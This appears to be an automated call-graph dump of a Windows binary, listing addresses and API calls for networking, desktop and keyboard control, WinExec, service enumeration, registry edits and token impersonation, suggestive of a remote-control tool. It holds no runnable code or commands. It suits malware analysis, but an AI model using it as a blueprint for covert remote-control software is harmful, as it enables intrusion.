7ff790cea140 70 API calls 3 library calls 22463->22539 22469 7ff790c57e6b GetProcAddress 22464->22469 22470 7ff790c57e9d 22464->22470 22472 7ff790c33730 _RunAllParam 89 API calls 22465->22472 22466->22457 22467->22457 22473 7ff790c57e8f FreeLibrary 22469->22473 22484 7ff790c57edd 22470->22484 22540 7ff790c4e580 97 API calls _RunAllParam 22470->22540 22471 7ff790c57e26 22471->22464 22472->22475 22473->22470 22475->22434 22475->22435 22478->22465 22478->22475 22480->22457 22481->22457 22485 7ff790c57fb2 22484->22485 22487 7ff790c33730 _RunAllParam 89 API calls 22484->22487 22486 7ff790ce7220 _getdrive 8 API calls 22485->22486 22488 7ff790c57ff0 22486->22488 22489 7ff790c57f3e 22487->22489 22541 7ff790c9ab00 95 API calls _RunAllParam 22489->22541 22492 7ff790c33730 _RunAllParam 89 API calls 22491->22492 22493 7ff790c5c309 EnterCriticalSection 22492->22493 22495 7ff790c5c348 22493->22495 22496 7ff790c5c338 LeaveCriticalSection 22493->22496 22498 7ff790c5c363 22495->22498 22499 7ff790c5c353 LeaveCriticalSection 22495->22499 22497 7ff790c5c4b7 22496->22497 22500 7ff790ce7220 _getdrive 8 API calls 22497->22500 22501 7ff790c5c37e 22498->22501 22502 7ff790c5c36e LeaveCriticalSection 22498->22502 22499->22497 22504 7ff790c5c4c7 22500->22504 22503 7ff790c33730 _RunAllParam 89 API calls 22501->22503 22502->22497 22505 7ff790c5c393 22503->22505 22504->22423 22542 7ff790c9a130 73 API calls _getdrive 22505->22542 22507 7ff790c5c39a 22508 7ff790c5c39e 22507->22508 22509 7ff790c5c3cd 22507->22509 22510 7ff790c33730 _RunAllParam 89 API calls 22508->22510 22543 7ff790c9a0c0 22509->22543 22512 7ff790c5c3bc LeaveCriticalSection 22510->22512 22512->22497 22513 7ff790c5c3d7 22514 7ff790c33730 _RunAllParam 89 API calls 22513->22514 22515 7ff790c5c3f1 22514->22515 22516 7ff790c5c4a1 22515->22516 22546 7ff790c99bc0 LoadLibraryA 22515->22546 22517 7ff790c5c4a3 LeaveCriticalSection 22516->22517 22517->22497 22520 7ff790c5c413 OpenProcess OpenProcessToken 22522 7ff790c5c43d 22520->22522 22523 7ff790c5c446 ImpersonateLoggedOnUser 22520->22523 22521 7ff790c5c480 22521->22517 22525 7ff790c5c491 timeGetTime 22521->22525 22526 7ff790c33730 _RunAllParam 89 API calls 22522->22526 22523->22522 22524 7ff790c5c46c CloseHandle CloseHandle 22523->22524 22524->22521 22525->22517 22527 7ff790c5c46a 22526->22527 22527->22524 22528->22457 22529->22457 22531->22457 22532->22426 22533->22457 22534->22427 22535->22457 22536->22457 22537->22444 22539->22471 22541->22485 22542->22507 22569 7ff790c99ef0 22543->22569 22545 7ff790c9a0d2 22545->22513 22547 7ff790c99c11 GetProcAddress GetProcAddress 22546->22547 22548 7ff790c99c46 22546->22548 22547->22548 22550 7ff790c99c40 22547->22550 22549 7ff790c99c49 GetSystemMetrics 22548->22549 22551 7ff790c99c80 CreateToolhelp32Snapshot 22549->22551 22552 7ff790c99c58 22549->22552 22550->22549 22554 7ff790c99c94 Process32First 22551->22554 22555 7ff790c99cb7 22551->22555 22552->22551 22553 7ff790c99c61 GetCurrentProcessId ProcessIdToSessionId 22552->22553 22553->22551 22556 7ff790c99cd0 22554->22556 22557 7ff790c99cae CloseHandle 22554->22557 22558 7ff790c99cc5 22555->22558 22559 7ff790c99cbc FreeLibrary 22555->22559 22563 7ff790c99d5a Process32Next 22556->22563 22564 7ff790c99d0b CloseHandle 22556->22564 22565 7ff790c99cf6 ProcessIdToSessionId 22556->22565 22610 7ff790ce9700 22556->22610 22557->22555 22561 7ff790ce7220 _getdrive 8 API calls 22558->22561 22559->22558 22562 7ff790c5c40f 22561->22562 22562->22520 22562->22521 22563->22556 22563->22564 22567 7ff790c99d26 22564->22567 22568 7ff790c99d1d FreeLibrary 22564->22568 22565->22556 22565->22563 22567->22558 22568->22567 22570 7ff790c99f28 22569->22570 22585 7ff790c99fdc 22569->22585 22573 7ff790c99f30 GetProcessWindowStation 22570->22573 22570->22585 22571 7ff790c99f3b 22576 7ff790c33730 _RunAllParam 89 API calls 22571->22576 22572 7ff790c99fec 22598 7ff790c99d80 22572->22598 22573->22571 22575 7ff790c99f47 GetUserObjectInformationA GetLastError SetLastError 22573->22575 22578 7ff790c99f79 RevertToSelf 22575->22578 22579 7ff790c99fae 22575->22579 22580 7ff790c9a0a9 22576->22580 22583 7ff790c33730 _RunAllParam 89 API calls 22578->22583 22584 7ff790c99fb7 22579->22584 22579->22585 22580->22545 22581 7ff790c9a000 GetUserNameA 22582 7ff790c9a06f 22581->22582 22586 7ff790c9a012 GetLastError 22581->22586 22588 7ff790c33730 _RunAllParam 89 API calls 22582->22588 22587 7ff790c99fa1 22583->22587 22589 7ff790c33730 _RunAllParam 89 API calls 22584->22589 22585->22571 22585->22572 22590 7ff790c9a01f 22586->22590 22591 7ff790c9a044 GetLastError 22586->22591 22587->22545 22592 7ff790c9a087 22588->22592 22593 7ff790c99fcc 22589->22593 22594 7ff790c33730 _RunAllParam 89 API calls 22590->22594 22595 7ff790c33730 _RunAllParam 89 API calls 22591->22595 22592->22545 22593->22545 22596 7ff790c9a034 22594->22596 22597 7ff790c9a062 22595->22597 22596->22545 22597->22545 22599 7ff790c99bc0 84 API calls 22598->22599 22600 7ff790c99da3 22599->22600 22601 7ff790c99da7 22600->22601 22602 7ff790c99dae OpenProcess OpenProcessToken 22600->22602 22608 7ff790ce7220 _getdrive 8 API calls 22601->22608 22603 7ff790c99de0 22602->22603 22604 7ff790c99de7 GetTokenInformation 22602->22604 22605 7ff790c99eb7 CloseHandle 22603->22605 22606 7ff790c99e16 LookupAccountSidA CloseHandle CloseHandle 22604->22606 22607 7ff790c99ea9 CloseHandle 22604->22607 22605->22601 22606->22601 22607->22605 22609 7ff790c99eda 22608->22609 22609->22581 22609->22582 22611 7ff790ce9731 22610->22611 22612 7ff790ce970d 22610->22612 22612->22611 22613 7ff790ceffc8 _errno 70 API calls 22612->22613 22614 7ff790ce9717 22613->22614 22617 7ff790cf49d4 22614->22617 22620 7ff790cf4964 DecodePointer 22617->22620 22621 7ff790cf49c3 22620->22621 22622 7ff790ce9722 22620->22622 22627 7ff790cf4930 16 API calls _isindst 22621->22627 22622->22556 23204 7ff790c3d560 19 API calls 2 library calls 23205 7ff790c40760 95 API calls free 23207 7ff790c3d790 11 API calls _getdrive 23208 7ff790c34790 DeleteCriticalSection 23209 7ff790c59390 121 API calls _RunAllParam 23211 7ff790c5f790 96 API calls 2 library calls 23212 7ff790c48190 125 API calls _RunAllParam 23214 7ff790c54003 213 API calls 2 library calls 23215 7ff790c3cf80 120 API calls 4 library calls 23216 7ff790c3f780 71 API calls __wtomb_environ 23217 7ff790c5e780 97 API calls __wtomb_environ 23218 7ff790c4bb80 122 API calls 2 library calls 23219 7ff790c4dd80 121 API calls 23221 7ff790c3ff30 11 API calls _getdrive 23222 7ff790c4a130 173 API calls 4 library calls 23223 7ff790c53530 120 API calls 2 library calls 23225 7ff790c54003 230 API calls 2 library calls 23226 7ff790c63523 92 API calls 2 library calls 23232 7ff790c4d149 96 API calls _RunAllParam 23233 7ff790c45550 99 API calls 4 library calls 23234 7ff790c3a550 104 API calls _RunAllParam 23236 7ff790c43550 14 API calls _getdrive 23237 7ff790c43d50 12 API calls _getdrive 23239 7ff790c5d150 177 API calls 3 library calls 23240 7ff790c59150 89 API calls _RunAllParam 23241 7ff790c4e550 97 API calls 23243 7ff790c81550 110 API calls _RunAllParam 23244 7ff790c36753 RegCloseKey 22027 7ff790c9cd40 inet_addr 22028 7ff790c9cd89 gethostbyname 22027->22028 22029 7ff790c9cdae htons connect 22027->22029 22030 7ff790c9cda1 22028->22030 22031 7ff790c9cd97 22028->22031 22029->22030 22032 7ff790c9cdd5 22029->22032 22034 7ff790ce7220 _getdrive 8 API calls 22030->22034 22031->22029 22031->22030 22033 7ff790c9cf90 14 API calls 22032->22033 22033->22030 22035 7ff790c9cded 22034->22035 23246 7ff790c54003 220 API calls 2 library calls 23248 7ff790c65940 109 API calls 23249 7ff790c66d40 165 API calls 4 library calls 23250 7ff790c49740 101 API calls 2 library calls 23253 7ff790c5f6f0 10 API calls _getdrive 23254 7ff790c590f0 EnterCriticalSection LeaveCriticalSection 23255 7ff790c5d0f0 DialogBoxParamA 23256 7ff790c4a6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 22036 7ff790c54cdb 22247 7ff790c9d890 97 API calls _RunAllParam 22036->22247 22038 7ff790c54cfc 22039 7ff790c54d52 22038->22039 22101 7ff790c80650 22038->22101 22248 7ff790c5f010 SetEvent 22039->22248 22043 7ff790c57c95 22045 7ff790c57cf7 22043->22045 22046 7ff790c57ca6 FlushFileBuffers 22043->22046 22044 7ff790c57c81 Sleep 22044->22043 22048 7ff790c57d08 FlushFileBuffers 22045->22048 22049 7ff790c57d59 22045->22049 22046->22045 22047 7ff790c57ce6 CloseHandle 22046->22047 22047->22045 22048->22049 22050 7ff790c57d48 CloseHandle 22048->22050 22255 7ff790c9a3b0 93 API calls 2 library calls 22049->22255 22050->22049 22053 7ff790c57d62 22054 7ff790c57d85 22053->22054 22256 7ff790c62170 16 API calls 22053->22256 22057 7ff790c57d9d CloseDesktop 22054->22057 22065 7ff790c57dbc 22054->22065 22055 7ff790c62220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22060 7ff790c54003 22055->22060 22058 7ff790c57da7 22057->22058 22057->22065 22061 7ff790c33730 _RunAllParam 89 API calls 22058->22061 22059 7ff790c33730 89 API calls _RunAllParam 22059->22060 22060->22055 22060->22059 22063 7ff790c531b0 27 API calls 22060->22063 22064 7ff790c5c590 16 API calls 22060->22064 22067 7ff790c33730 _RunAllParam 89 API calls 22060->22067 22070 7ff790c5419d GetTickCount 22060->22070 22075 7ff790c9d440 16 API calls 22060->22075 22083 7ff790c57c72 22060->22083 22086 7ff790c9d890 97 API calls 22060->22086 22087 7ff790c57c47 CloseDesktop 22060->22087 22090 7ff790c540bf CloseDesktop 22060->22090 22096 7ff790c57b99 LeaveCriticalSection 22060->22096 22243 7ff790c9a5b0 98 API calls 2 library calls 22060->22243 22244 7ff790c9a3b0 93 API calls 2 library calls 22060->22244 22245 7ff790c995d0 EnterCriticalSection LeaveCriticalSection 22060->22245 22246 7ff790c5c6f0 18 API calls _RunAllParam 22060->22246 22249 7ff790c9d170 22060->22249 22253 7ff790c5b1f0 97 API calls _vsnprintf_l 22060->22253 22254 7ff790c5c4e0 93 API calls _RunAllParam 22060->22254 22061->22065 22063->22060 22064->22060 22066 7ff790c33730 _RunAllParam 89 API calls 22065->22066 22068 7ff790c57dfc GetModuleFileNameA 22066->22068 22071 7ff790c54075 OpenInputDesktop 22067->22071 22072 7ff790c57e15 22068->22072 22073 7ff790c57e56 LoadLibraryA 22068->22073 22070->22060 22071->22060 22074 7ff790c57c54 22071->22074 22257 7ff790cea140 70 API calls 3 library calls 22072->22257 22077 7ff790c57e6b GetProcAddress 22073->22077 22078 7ff790c57e9d 22073->22078 22080 7ff790c33730 _RunAllParam 89 API calls 22074->22080 22075->22060 22081 7ff790c57e8f FreeLibrary 22077->22081 22093 7ff790c57edd 22078->22093 22258 7ff790c4e580 97 API calls _RunAllParam 22078->22258 22079 7ff790c57e26 22079->22073 22080->22083 22081->22078 22083->22043 22083->22044 22086->22060 22087->22074 22087->22083 22090->22060 22094 7ff790c57fb2 22093->22094 22097 7ff790c33730 _RunAllParam 89 API calls 22093->22097 22095 7ff790ce7220 _getdrive 8 API calls 22094->22095 22098 7ff790c57ff0 22095->22098 22096->22060 22099 7ff790c57f3e 22097->22099 22259 7ff790c9ab00 95 API calls _RunAllParam 22099->22259 22102 7ff790c33730 _RunAllParam 89 API calls 22101->22102 22103 7ff790c8068e 22102->22103 22104 7ff790c809af VkKeyScanA 22103->22104 22106 7ff790c8102e 22103->22106 22108 7ff790c33730 _RunAllParam 89 API calls 22103->22108 22105 7ff790c809c2 22104->22105 22107 7ff790c33730 _RunAllParam 89 API calls 22105->22107 22109 7ff790c8109a 22106->22109 22112 7ff790c33730 _RunAllParam 89 API calls 22106->22112 22110 7ff790c80a08 22107->22110 22111 7ff790c80743 22108->22111 22118 7ff790c810ee 22109->22118 22294 7ff790c82ef0 81 API calls 22109->22294 22113 7ff790c80d54 GetKeyState 22110->22113 22114 7ff790c80a13 22110->22114 22115 7ff790c33730 _RunAllParam 89 API calls 22111->22115 22112->22109 22116 7ff790c80d71 22113->22116 22117 7ff790c33730 _RunAllParam 89 API calls 22114->22117 22163 7ff790c80d0a 22114->22163 22115->22104 22120 7ff790c80dbf 22116->22120 22192 7ff790c80eaa 22116->22192 22121 7ff790c80a33 22117->22121 22260 7ff790c81620 22118->22260 22124 7ff790c80dc9 GetAsyncKeyState 22120->22124 22158 7ff790c80e0a 22120->22158 22126 7ff790c33730 _RunAllParam 89 API calls 22121->22126 22122 7ff790c33730 _RunAllParam 89 API calls 22128 7ff790c80fe2 MapVirtualKeyA 22122->22128 22123 7ff790c810df 22295 7ff790c82370 71 API calls 22123->22295 22130 7ff790c80dd8 MapVirtualKeyA 22124->22130 22124->22158 22132 7ff790c80a4b 22126->22132 22127 7ff790c80e14 GetAsyncKeyState 22133 7ff790c80e24 MapVirtualKeyA 22127->22133 22179 7ff790c80e58 22127->22179 22289 7ff790c474c0 18 API calls 22128->22289 22283 7ff790c474c0 18 API calls 22130->22283 22131 7ff790c81108 22141 7ff790c8115f GetAsyncKeyState 22131->22141 22146 7ff790c8111e 22131->22146 22138 7ff790c80a58 22132->22138 22139 7ff790c80d37 22132->22139 22284 7ff790c474c0 18 API calls 22133->22284 22135 7ff790c80eb3 22147 7ff790c80f17 GetAsyncKeyState 22135->22147 22148 7ff790c80ec6 GetAsyncKeyState 22135->22148 22135->22192 22136 7ff790c80e62 GetAsyncKeyState 22143 7ff790c80e76 MapVirtualKeyA 22136->22143 22136->22192 22149 7ff790c80b27 GetAsyncKeyState 22138->22149 22150 7ff790c80ad4 GetAsyncKeyState 22138->22150 22151 7ff790c33730 _RunAllParam 89 API calls 22139->22151 22141->22146 22153 7ff790c81174 GetAsyncKeyState 22141->22153 22142 7ff790c81001 22290 7ff790c802a0 109 API calls _RunAllParam 22142->22290 22285 7ff790c474c0 18 API calls 22143->22285 22144 7ff790c80def 22156 7ff790c33730 _RunAllParam 89 API calls 22144->22156 22145 7ff790c8124d MapVirtualKeyA 22297 7ff790c474c0 18 API calls 22145->22297 22146->22145 22159 7ff790c81151 22146->22159 22166 7ff790c80f27 MapVirtualKeyA 22147->22166 22167 7ff790c80f62 GetAsyncKeyState 22147->22167 22160 7ff790c80eda MapVirtualKeyA 22148->22160 22148->22192 22169 7ff790c80b3c MapVirtualKeyA 22149->22169 22170 7ff790c80b77 GetAsyncKeyState 22149->22170 22161 7ff790c80aec MapVirtualKeyA 22150->22161 22162 7ff790c80b1e 22150->22162 22151->22163 22152 7ff790c80e3b 22164 7ff790c33730 _RunAllParam 89 API calls 22152->22164 22153->22146 22165 7ff790c81184 22153->22165 22156->22158 22158->22127 22158->22179 22159->22145 22286 7ff790c474c0 18 API calls 22160->22286 22267 7ff790c474c0 18 API calls 22161->22267 22175 7ff790c33730 _RunAllParam 89 API calls 22162->22175 22163->22039 22164->22179 22165->22146 22186 7ff790c33730 _RunAllParam 89 API calls 22165->22186 22287 7ff790c474c0 18 API calls 22166->22287 22177 7ff790c80f72 MapVirtualKeyA 22167->22177 22167->22192 22168 7ff790c8100a 22291 7ff790c802a0 109 API calls _RunAllParam 22168->22291 22268 7ff790c474c0 18 API calls 22169->22268 22170->22162 22173 7ff790c80b87 MapVirtualKeyA 22170->22173 22171 7ff790c80e8d 22182 7ff790c33730 _RunAllParam 89 API calls 22171->22182 22172 7ff790c81267 22172->22172 22269 7ff790c474c0 18 API calls 22173->22269 22185 7ff790c80bf1 MapVirtualKeyA 22175->22185 22288 7ff790c474c0 18 API calls 22177->22288 22179->22135 22179->22136 22182->22192 22184 7ff790c80ef1 22194 7ff790c33730 _RunAllParam 89 API calls 22184->22194 22270 7ff790c474c0 18 API calls 22185->22270 22196 7ff790c811a5 22186->22196 22187 7ff790c80f40 22197 7ff790c33730 _RunAllParam 89 API calls 22187->22197 22189 7ff790c80b03 22199 7ff790c33730 _RunAllParam 89 API calls 22189->22199 22190 7ff790c81013 22292 7ff790c802a0 109 API calls _RunAllParam 22190->22292 22191 7ff790c80b55 22201 7ff790c33730 _RunAllParam 89 API calls 22191->22201 22192->22122 22193 7ff790c80ba0 22203 7ff790c33730 _RunAllParam 89 API calls 22193->22203 22194->22192 22205 7ff790c811ba 22196->22205 22206 7ff790c81206 22196->22206 22207 7ff790c80f5e 22197->22207 22198 7ff790c80f8b 22208 7ff790c33730 _RunAllParam 89 API calls 22198->22208 22199->22162 22202 7ff790c80b73 22201->22202 22202->22170 22203->22162 22204 7ff790c80c08 MapVirtualKeyA 22271 7ff790c474c0 18 API calls 22204->22271 22213 7ff790c33730 _RunAllParam 89 API calls 22205->22213 22224 7ff790c811fd 22205->22224 22214 7ff790c33730 _RunAllParam 89 API calls 22206->22214 22206->22224 22207->22167 22208->22192 22209 7ff790c8101c 22293 7ff790c802a0 109 API calls _RunAllParam 22209->22293 22212 7ff790c80c1f MapVirtualKeyA 22272 7ff790c474c0 18 API calls 22212->22272 22217 7ff790c811ce CreateThread CloseHandle 22213->22217 22218 7ff790c8121a 22214->22218 22215 7ff790c81025 22215->22106 22217->22224 22296 7ff790c9a910 116 API calls _RunAllParam 22218->22296 22219 7ff790c33730 _RunAllParam 89 API calls 22222 7ff790c81230 WinExec 22219->22222 22220 7ff790c80c36 MapVirtualKeyA 22273 7ff790c474c0 18 API calls 22220->22273 22222->22159 22224->22219 22225 7ff790c80c53 MapVirtualKeyA 22274 7ff790c474c0 18 API calls 22225->22274 22227 7ff790c80c6c MapVirtualKeyA 22275 7ff790c474c0 18 API calls 22227->22275 22229 7ff790c80c89 MapVirtualKeyA 22276 7ff790c474c0 18 API calls 22229->22276 22231 7ff790c80ca2 MapVirtualKeyA 22277 7ff790c474c0 18 API calls 22231->22277 22233 7ff790c80cbf MapVirtualKeyA 22278 7ff790c474c0 18 API calls 22233->22278 22235 7ff790c80cd8 MapVirtualKeyA 22279 7ff790c474c0 18 API calls 22235->22279 22237 7ff790c80cef 22280 7ff790c802a0 109 API calls _RunAllParam 22237->22280 22239 7ff790c80cf8 22281 7ff790c802a0 109 API calls _RunAllParam 22239->22281 22241 7ff790c80d01 22282 7ff790c802a0 109 API calls _RunAllParam 22241->22282 22243->22060 22244->22060 22246->22060 22247->22038 22248->22060 22250 7ff790c9d182 22249->22250 22251 7ff790c9d18a setsockopt 22249->22251 22250->22060 22251->22250 22252 7ff790c9d1b5 setsockopt 22251->22252 22252->22060 22253->22060 22254->22060 22255->22053 22257->22079 22259->22094 22261 7ff790c8163b 22260->22261 22262 7ff790c81665 22261->22262 22298 7ff790c82f30 22261->22298 22262->22131 22266 7ff790c8169c 22266->22131 22267->22189 22268->22191 22269->22193 22270->22204 22271->22212 22272->22220 22273->22225 22274->22227 22275->22229 22276->22231 22277->22233 22278->22235 22279->22237 22280->22239 22281->22241 22282->22163 22283->22144 22284->22152 22285->22171 22286->22184 22287->22187 22288->22198 22289->22142 22290->22168 22291->22190 22292->22209 22293->22215 22294->22123 22295->22118 22296->22224 22297->22172 22302 7ff790c82ff0 22298->22302 22300 7ff790c81689 22301 7ff790c82550 71 API calls 22300->22301 22301->22266 22330 7ff790ce7978 22302->22330 22305 7ff790c83008 22305->22300 22307 7ff790c83043 22343 7ff790cf2950 22307->22343 22309 7ff790c83060 GetWindowLongPtrA 22310 7ff790c830b9 22309->22310 22317 7ff790c83140 22309->22317 22312 7ff790c831ae SetWindowLongPtrA GetDlgItem 22310->22312 22316 7ff790c830c5 22310->22316 22311 7ff790c83265 EndDialog 22313 7ff790c831a7 22311->22313 22314 7ff790c831de SendMessageA GetDlgItem 22312->22314 22315 7ff790ce7220 _getdrive 8 API calls 22313->22315 22319 7ff790c8320f SetForegroundWindow 22314->22319 22318 7ff790c8328a 22315->22318 22316->22313 22316->22317 22320 7ff790c8314a GetDlgItem SendMessageA 22316->22320 22321 7ff790c830e4 22316->22321 22317->22311 22318->22300 22325 7ff790c8322e 22319->22325 22322 7ff790c8318f 22320->22322 22323 7ff790c83174 SendMessageA 22320->22323 22321->22313 22324 7ff790c830ef GetDlgItem SendMessageA 22321->22324 22322->22311 22323->22322 22324->22317 22326 7ff790c83117 SendMessageA 22324->22326 22327 7ff790c8324d GetDlgItem EnableWindow 22325->22327 22328 7ff790c8323a GetDlgItem EnableWindow 22325->22328 22326->22317 22329 7ff790c83132 22326->22329 22327->22313 22328->22313 22329->22317 22332 7ff790ce7983 22330->22332 22333 7ff790c83003 22332->22333 22336 7ff790ce79a2 22332->22336 22346 7ff790cf3238 DecodePointer 22332->22346 22348 7ff790ce8c34 22332->22348 22333->22305 22342 7ff790ce749c 70 API calls std::exception::operator= 22333->22342 22335 7ff790ce79f3 22366 7ff790ce755c 70 API calls std::exception::operator= 22335->22366 22336->22335 22365 7ff790ce7b94 80 API calls 22336->22365 22338 7ff790ce7a04 22340 7ff790cf2950 RaiseException 22338->22340 22341 7ff790ce7a1a 22340->22341 22342->22307 22344 7ff790cf297e 22343->22344 22345 7ff790cf29bd RaiseException 22344->22345 22345->22309 22347 7ff790cf3253 22346->22347 22347->22332 22349 7ff790ce8cc8 22348->22349 22361 7ff790ce8c4c 22348->22361 22350 7ff790cf3238 _callnewh DecodePointer 22349->22350 22352 7ff790ce8ccd 22350->22352 22351 7ff790ce8c84 HeapAlloc 22355 7ff790ce8cbd 22351->22355 22351->22361 22354 7ff790ceffc8 _errno 69 API calls 22352->22354 22354->22355 22355->22332 22356 7ff790ce8cad 22370 7ff790ceffc8 22356->22370 22359 7ff790cf3238 _callnewh DecodePointer 22359->22361 22360 7ff790ce8cb2 22363 7ff790ceffc8 _errno 69 API calls 22360->22363 22361->22351 22361->22356 22361->22359 22361->22360 22364 7ff790ce8c64 22361->22364 22363->22355 22364->22351 22367 7ff790cf2ed0 70 API calls 2 library calls 22364->22367 22368 7ff790cf2c70 70 API calls 4 library calls 22364->22368 22369 7ff790ceabd8 GetModuleHandleW GetProcAddress ExitProcess _amsg_exit 22364->22369 22365->22335 22366->22338 22367->22364 22368->22364 22373 7ff790cf37c4 GetLastError FlsGetValue 22370->22373 22372 7ff790ceffd1 22372->22360 22374 7ff790cf3832 SetLastError 22373->22374 22375 7ff790cf37ea 22373->22375 22374->22372 22385 7ff790cf32ec 22375->22385 22378 7ff790cf37ff FlsSetValue 22379 7ff790cf3815 22378->22379 22380 7ff790cf382b 22378->22380 22390 7ff790cf370c 22379->22390 22399 7ff790ce8bf4 22380->22399 22384 7ff790cf3830 22384->22374 22386 7ff790cf3311 22385->22386 22388 7ff790cf3351 22386->22388 22389 7ff790cf332f Sleep 22386->22389 22405 7ff790cf9234 22386->22405 22388->22374 22388->22378 22389->22386 22389->22388 22413 7ff790cf77d0 22390->22413 22392 7ff790cf3765 22393 7ff790cf76d0 _wgetenv LeaveCriticalSection 22392->22393 22394 7ff790cf377a 22393->22394 22395 7ff790cf77d0 _lock 70 API calls 22394->22395 22396 7ff790cf3784 ___lc_codepage_func 22395->22396 22397 7ff790cf76d0 _wgetenv LeaveCriticalSection 22396->22397 22398 7ff790cf37b6 GetCurrentThreadId 22397->22398 22398->22374 22400 7ff790ce8bf9 RtlFreeHeap 22399->22400 22404 7ff790ce8c29 free 22399->22404 22401 7ff790ce8c14 22400->22401 22400->22404 22402 7ff790ceffc8 _errno 68 API calls 22401->22402 22403 7ff790ce8c19 GetLastError 22402->22403 22403->22404 22404->22384 22406 7ff790cf9249 22405->22406 22410 7ff790cf9266 22405->22410 22407 7ff790cf9257 22406->22407 22406->22410 22408 7ff790ceffc8 _errno 69 API calls 22407->22408 22411 7ff790cf925c 22408->22411 22409 7ff790cf927e HeapAlloc 22409->22410 22409->22411 22410->22409 22410->22411 22412 7ff790cf3238 _callnewh DecodePointer 22410->22412 22411->22386 22412->22410 22414 7ff790cf77ff EnterCriticalSection 22413->22414 22415 7ff790cf77ee 22413->22415 22416 7ff790cf76e8 _lock 69 API calls 22415->22416 22417 7ff790cf77f3 22416->22417 22417->22414 22418 7ff790ceaf34 _amsg_exit 69 API calls 22417->22418 22418->22414 22628 7ff790c580da 22647 7ff790c40270 22628->22647 22630 7ff790c581c6 22654 7ff790ce92a4 22630->22654 22634 7ff790c58211 LoadLibraryA 22635 7ff790c5825e 22634->22635 22636 7ff790c58247 GetProcAddress 22634->22636 22637 7ff790c33730 _RunAllParam 89 API calls 22635->22637 22636->22635 22638 7ff790c5828f 22637->22638 22639 7ff790c33730 _RunAllParam 89 API calls 22638->22639 22640 7ff790c582f7 22639->22640 22641 7ff790ce7978 81 API calls 22640->22641 22642 7ff790c5831e 22641->22642 22643 7ff790ce7978 81 API calls 22642->22643 22644 7ff790c58454 22643->22644 22645 7ff790c58469 22644->22645 22666 7ff790c43fb0 22644->22666 22648 7ff790ce92a4 __wtomb_environ 70 API calls 22647->22648 22649 7ff790c4028f CreateRectRgn 22648->22649 22650 7ff790ce92a4 __wtomb_environ 70 API calls 22649->22650 22651 7ff790c402b3 CreateRectRgn 22650->22651 22652 7ff790ce92a4 __wtomb_environ 70 API calls 22651->22652 22653 7ff790c402d7 CreateRectRgn 22652->22653 22653->22630 22655 7ff790ce92bb _FF_MSGBANNER 22654->22655 22661 7ff790c581e7 CreateRectRgn 22654->22661 22656 7ff790ce8c34 malloc 70 API calls 22655->22656 22657 7ff790ce92cc 22656->22657 22657->22661 22674 7ff790ce7de8 70 API calls 2 library calls 22657->22674 22659 7ff790ce92e3 22660 7ff790ce92ec 22659->22660 22659->22661 22675 7ff790cf4930 16 API calls _isindst 22660->22675 22664 7ff790c321e0 22661->22664 22665 7ff790c32259 22664->22665 22665->22634 22667 7ff790c43fe1 _vsnprintf_l 22666->22667 22668 7ff790c4408b GetComputerNameA 22667->22668 22669 7ff790c440d0 LoadLibraryA 22668->22669 22670 7ff790c440a6 22668->22670 22671 7ff790c440fd 22669->22671 22672 7ff790c440e6 22669->22672 22670->22669 22671->22645 22676 7ff790c3a040 8 API calls 22672->22676 22674->22659 22676->22671 23258 7ff790c356e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 23260 7ff790c61ae0 15 API calls _getdrive 23261 7ff790c608e0 117 API calls _RunAllParam 23262 7ff790c54003 198 API calls 2 library calls 23263 7ff790c40310 73 API calls free 23264 7ff790c43110 73 API calls 2 library calls 23265 7ff790c39910 11 API calls _getdrive 23266 7ff790c3a910 99 API calls _RunAllParam 23267 7ff790c35910 13 API calls _getdrive 23268 7ff790c5ab10 96 API calls 2 library calls 23269 7ff790c634f7 10 API calls _getdrive 22677 7ff790c39d00 22698 7ff790c329a0 22677->22698 22679 7ff790c39d6b 22680 7ff790c39db3 OpenSCManagerA 22679->22680 22681 7ff790c39de0 EnumServicesStatusA 22680->22681 22685 7ff790c39dc9 22680->22685 22682 7ff790c39fed CloseServiceHandle 22681->22682 22683 7ff790c39e2b GetLastError 22681->22683 22682->22685 22683->22682 22684 7ff790c39e3c 22683->22684 22684->22682 22688 7ff790c39e54 EnumServicesStatusA 22684->22688 22686 7ff790ce7220 _getdrive 8 API calls 22685->22686 22687 7ff790c3a017 22686->22687 22689 7ff790c39fe1 _RunAllParam 22688->22689 22690 7ff790c39e93 22688->22690 22689->22682 22690->22689 22691 7ff790c39eac OpenServiceA 22690->22691 22691->22689 22692 7ff790c39ecb QueryServiceConfigA 22691->22692 22693 7ff790c39fc7 CloseServiceHandle 22692->22693 22694 7ff790c39ee5 GetLastError 22692->22694 22693->22689 22693->22690 22694->22693 22697 7ff790c39ef4 _RunAllParam 22694->22697 22695 7ff790c39f08 QueryServiceConfigA 22695->22697 22696 7ff790c329a0 81 API calls 22696->22697 22697->22693 22697->22695 22697->22696 22699 7ff790c32a17 22698->22699 22700 7ff790c329bd 22698->22700 22702 7ff790c32a29 22699->22702 22717 7ff790ce70b4 71 API calls std::exception::exception 22699->22717 22700->22699 22705 7ff790c329e6 22700->22705 22704 7ff790c32a42 22702->22704 22718 7ff790c33050 81 API calls std::exception::exception 22702->22718 22704->22679 22706 7ff790c32d12 22705->22706 22719 7ff790ce7110 71 API calls std::exception::exception 22705->22719 22707 7ff790c32d41 22706->22707 22708 7ff790c32d22 22706->22708 22711 7ff790c32d53 22707->22711 22722 7ff790ce70b4 71 API calls std::exception::exception 22707->22722 22720 7ff790c32fb0 71 API calls 22708->22720 22716 7ff790c32d3c 22711->22716 22723 7ff790c33050 81 API calls std::exception::exception 22711->22723 22712 7ff790c32d2f 22721 7ff790c32fb0 71 API calls 22712->22721 22716->22679 22717->22702 22718->22704 22719->22706 22720->22712 22721->22716 22722->22711 22723->22716 23270 7ff790c42d00 24 API calls 23271 7ff790c3f700 280 API calls 2 library calls 23272 7ff790c60700 9 API calls 23273 7ff790c65100 82 API calls 2 library calls 23277 7ff790c43cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 23278 7ff790c434b0 13 API calls _getdrive 23279 7ff790c3a6b0 93 API calls 2 library calls 23284 7ff790cb3ca0 75 API calls 3 library calls 22724 7ff790c588a0 getpeername inet_ntoa 22725 7ff790ce92a4 __wtomb_environ 70 API calls 22724->22725 22726 7ff790c58913 22725->22726 22727 7ff790ce7978 81 API calls 22726->22727 22728 7ff790c58930 22727->22728 22729 7ff790c5893d InitializeCriticalSection 22728->22729 22731 7ff790c5895e 